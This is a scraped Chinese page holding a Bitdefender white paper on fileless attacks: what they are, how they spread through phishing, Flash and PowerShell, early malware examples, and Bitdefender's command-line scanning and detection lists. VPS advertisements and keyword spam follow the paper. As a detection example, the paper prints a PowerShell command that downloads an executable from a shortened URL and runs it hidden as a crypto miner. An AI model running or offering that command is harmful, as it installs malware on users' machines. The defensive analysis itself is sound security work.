攻击cmd病毒

cmd病毒  时间:2021-05-23  阅读:()

无文件攻击-白皮书无文件攻击黑客越来越多地转向无文件攻击,因为它们比基于文件的攻击成功的可能性高10倍.
这些无文件感染证明了网络犯罪分子的足智多谋和创造力.
无文件攻击-白皮书什么是无文件攻击无文件攻击(也称为零占用或宏攻击)与传统恶意软件的不同之处在于,它不需要安装恶意软件来感染受害者的计算机.
相反,它利用了计算机上的现有漏洞.
它存在于计算机的内存中,并使用常见的系统工具通过将恶意代码注入正常安全且受信任的进程(如javaw.
exe和iexplore.
exe)来执行攻击.
这些攻击可以在不下载任何恶意文件的情况下控制计算机,因此得名.
无文件攻击也被称为基于内存的攻击或"外部"的攻击.
攻击者可以利用最终用户每天使用的易受攻击的软件来渗透和入侵.
为什么网络犯罪分子会使用无文件攻击黑客越来越多地转向无文件攻击,因为他们成功的可能性是基于文件的攻击的10倍.
这些无文件感染证明了网络犯罪分子的足智多谋和创造力.
在他们的攻击中,黑客的目标是:隐身-尽可能避免被安全产品检测到的能力.
权限提升-利用漏洞的能力,使其能够对系统进行管理访问,以便他们可以随心所欲地执行任何操作.
信息收集-尽可能多地收集有关受害者和受害者计算机的数据,以便以后用于其他攻击.
持久性-能够在最长的时间内将恶意软件保留在系统中,未被发现.
[2]1.
2.
用户收到带有恶意网站链接的垃圾邮件6.
用户点击链接PowerShell脚本定位并将用户的数据发送给攻击者3.
5.
恶意网站在用户的计算机上加载具有已知Flash漏洞4.
>_PowerShell从命令和控制服务器下载并执行脚本Flash将打开WindowsPowerShell工具,该工具可以在内存中运行时通过命令行执行指令无文件攻击-白皮书无文件攻击如何工作无文件攻击就像大多数其他网络攻击一样开始.
网络犯罪分子试图访问计算机系统.
他们可能会尝试在未修补的软件中利用安全漏洞,或尝试使用爆破攻击来破解服务帐户的密码.
一种更常见的技术是发送网络钓鱼电子邮件,试图欺骗人们点击恶意链接或打开恶意,例如包含宏的MicrosoftWord文档.
一旦黑客获得访问权限,他们就会直接从计算机的内存中运行命令或恶意软件.
他们经常利用内置的系统管理工具(如WindowsPowerShell或计划任务)来运行命令和恶意软件.
有四种主要攻击类别:仅限内存的威胁.
这些威胁利用Windows服务中的漏洞直接在内存中执行其payload.
重新启动受仅内存威胁感染的系统会清除掉病毒.
无文件持久性攻击.
在这些攻击中,即使恶意payload未加载到硬盘上,即使系统重新启动,感染仍然存在.
两用工具攻击.
攻击者使用合法的Windows系统工具和应用程序,但出于恶意目的,例如获取目标系统的凭据或将数据发送回给他们.
非可移植可执行(PE)文件攻击.
这是一种涉及脚本和合法工具的两用工具攻击.
这些攻击经常使用PowerShell,WScript或CScript.
历史记录无文件恶意软件感染于2014年8月出现,当时PoweliksTrojan首次亮相.
它最初设计用于执行点击欺诈,但它演变成基于注册表的威胁.
该标本通过利用MicrosoftWord漏洞进入系统.
它使用PowerShell和JavaScript以及shellcode来快速启动其内存执行.
另一个在2015年引起关注的无文件恶意软件标本是Kovter.
在那个化身中,Kovter的感染技术与Poweliks的感染技术非常相似.
即使在使用恶意Windows可执行文件启动感染时,样本也会在注册表中存储模糊或加密的工件后删除该文件.
至少有一个变体通过使用执行JavaScript的快捷方式文件来维持持久性.
此脚本启动PowerShell并执行shellcode,以便在向其中注入恶意代码后启动非恶意应用程序.
在2016年中期,PowerSniff感染始于带有恶意宏的MicrosoftWord文档.
该标本的内存机制类似于Kovter的某些方面,并涉及执行shellcode的PowerShell脚本,该脚本解码并执行额外的恶意负载,仅在内存中运行.
PowerSniff能够将恶意DLL临时保存到文件系统.
2017年初,另一个名为POSHSPY的复杂攻击使用操作系统的WindowsManagementInstrumentation(WMI)功能来维护持久性,并依靠PowerShell来实现其有效负载.
该样本能够下载可执行文件,并将其保存到文件系统中.
Bitdefender如何保护您免受无文件攻击Bitdefender使用以下技术来检测无文件攻击:命令行监控我们正在监视已知用于执行无文件攻击的进程列表.
此列表包括诸如的进程autoit.
exe,bitsadmin.
exe,cscript.
exe,java.
exe,javaw.
exe,miprvse.
exe,net.
exe,netsh.
exe,powershell.
exe,powershell_ise.
exe,py.
exe,python.
exe,regedit.
exe,regsvr32.
exe,rundll32.
exe,schtasks.
exe,和wscript.
exe.
当在Bitdefender技术保护的机器上启动新进程时,将提取命令行并将其作为缓冲区发送到扫描引擎,使用有关原始进程路径和父进程的信息扩充扫描上下文.
在其他文件类型中找到的标识为命令(cmd)的缓冲区也会被扫描,如LNK,JOB,BAT和PS1.
[3]无文件攻击-白皮书缓冲区攻击示例:\Device\HarddiskVolume1\Windows\SysWOW64\WindowsPowerShell\v1.
0\powershell.
exe"-command"New-Item-ItemTypeDirectory-Force($env:APPDATA+\'\\FastCh\new-objectSystem.
Net.
WebClient).
DownloadFile(\'http://bit.
ly/2nzJcoP\',($env:APPDATA+\'\\FastCh\\CleanWork.
exe\Start-Process-WindowStylehidden$env:APPDATA\'\\FastCh\\CleanWork.
exe\'\'-of.
pooling.
cf:80--nicehash--max-cpu-usage=20--keepalive-B\'扫描流程1.
在少数情况下,执行一些特定的预处理.
例如,cmd.
exe进程忽略了(^)字符,因此它从命令行中删除.
2.
命令行分为单词/token,其中一个单词/token表示由空格或引号分隔的字符串.
3.
每个单词由一系列线性处理管道(tokenizer)处理:a)如果单词是Base64字符串,则标记生成器从头开始解码并处理字符串,因为它将成为命令行的一部分.
b)如果单词是引号中的字符串,则它从内到外作为单个单词处理一次,然后作为命令行的一部分处理.
c)如果当前单词以字符串X结束,或包含(视情况而定或优先选择)字符串X,则将它传递给下一阶段,这只能通过下一个字来克服.
4.
当单词到达最终状态时,设置一个标志,并且标记器进程从下一个单词开始.
5.
在扫描过程中,我们在每个受监视的过程中搜索单词或关键词序列.
6.
对于每个单词或单词序列,我们设置特定的标志,因为这些单词具有含义:从特定的过程参数到URL.
例如,EncodedCommand字是Powershell的参数.
7.
再一次,如果一个单词在Base64中被编码,它将被解码并且结果将被重新引入到过程算法中.
8.
启发式算法是根据从上述标记器中提取的标志构建的.
它们还可以与引用父进程的标志组合使用.
代码缓冲区在扫描文件较少的攻击时,我们还会关联其他Bitdefender技术的信息,例如:高级反漏洞检测到的内存缓冲区,遵循面向返回编程(ROP)等开发方法.
例如,包含在浏览器内存中的Flash沙箱外部执行的shellcode的缓冲区.
进程检测可以通过执行行为过程分析来检测前所未见的恶意软件.
对于无文件攻击,我们会查找进程检测检测到的可疑内存缓冲区,这是由于远程进程中的代码注入,以及在某些情况下,在同一源进程的内存中.
例如,我们扫描在漏洞利用框架中常用的meterpreterreverse-shell可执行文件的缓冲区,如MetaSploit.
Bitdefender是一家全球领先的安全技术公司,为150多个国家的5亿多用户提供尖端的端到端网络安全解决方案和高级威胁防护.
自2001年以来,Bitdefender一直致力于制作屡获殊荣的商业和消费者安全技术,并且是混合基础设施安全和端点保护的首选供应商.
通过研发,联盟和合作伙伴关系,Bitdefender值得信赖,领先并提供您可以信赖的强大安全性.
有关更多信息,请访问官方网站:http://www.
bitdefender-cn.
com.
AllRightsReserved.
2017Bitdefender.
Alltrademarks,tradenames,andproductsreferencedhereinarepropertyoftheirrespectiveowners.

半月湾($59.99/年),升级带宽至200M起步 三网CN2 GIA线路

在前面的文章中就有介绍到半月湾Half Moon Bay Cloud服务商有提供洛杉矶DC5数据中心云服务器,这个堪比我们可能熟悉的某服务商,如果我们有用过的话会发现这个服务商的价格比较贵,而且一直缺货。这里,于是半月湾服务商看到机会来了,于是有新增同机房的CN2 GIA优化线路。在之前的文章中介绍到Half Moon Bay Cloud DC5机房且进行过测评。这次的变化是从原来基础的年付49....

virmach:AMD平台小鸡,赌一把,单车变摩托?$7.2/年-512M内存/1核/10gSSD/1T流量,多机房可选

virmach送来了夏季促销,价格低到爆炸,而且在低价的基础上还搞首年8折,也就是说VPS低至7.2美元/年。不过,这里有一点要说明:你所购买的当前的VPS将会在09/30/2021 ~ 04/30/2022进行服务器转移,而且IP还会改变,当前的Intel平台会换成AMD平台,机房也会变动(目前来看以后会从colocrossing切换到INAP和Psychz),采取的是就近原则,原来的水牛城可能...

Atcloud:全场8折优惠,美国/加拿大/英国/法国/德国/新加坡vps,500g大硬盘/2T流量/480G高防vps,$4/月

atcloud怎么样?atcloud刚刚发布了最新的8折优惠码,该商家主要提供常规cloud(VPS)和storage(大硬盘存储)系列VPS,其数据中心分布在美国(俄勒冈、弗吉尼亚)、加拿大、英国、法国、德国、新加坡,所有VPS默认提供480Gbps的超高DDoS防御。Atcloud高防VPS。atcloud.net,2020年成立,主要提供基于KVM虚拟架构的VPS、只能DNS解析、域名、SS...

cmd病毒为你推荐
命令ios10http://www.paper.edu.cn设备ipad更新iphone深圳市富满电子集团股份有限公司Descriptionios5ipad连不上wifiipad显示无互联网连接怎么回事?windows键是哪个Windows快捷键是什么itunes备份怎样用itunes备份iphone联通iphone4联通iphone4跟苹果的iphone4有什么不一样? 比如少了什么功能? 还是什么的?
深圳网站空间 免备案虚拟主机 联通c套餐 hostmonster 宕机监控 iis安装教程 免费全能空间 100m免费空间 bgp双线 怎么测试下载速度 刀片服务器的优势 100m空间 最好的免费空间 hdd 申请网站 海外空间 韩国代理ip 东莞主机托管 畅行云 成都主机托管 更多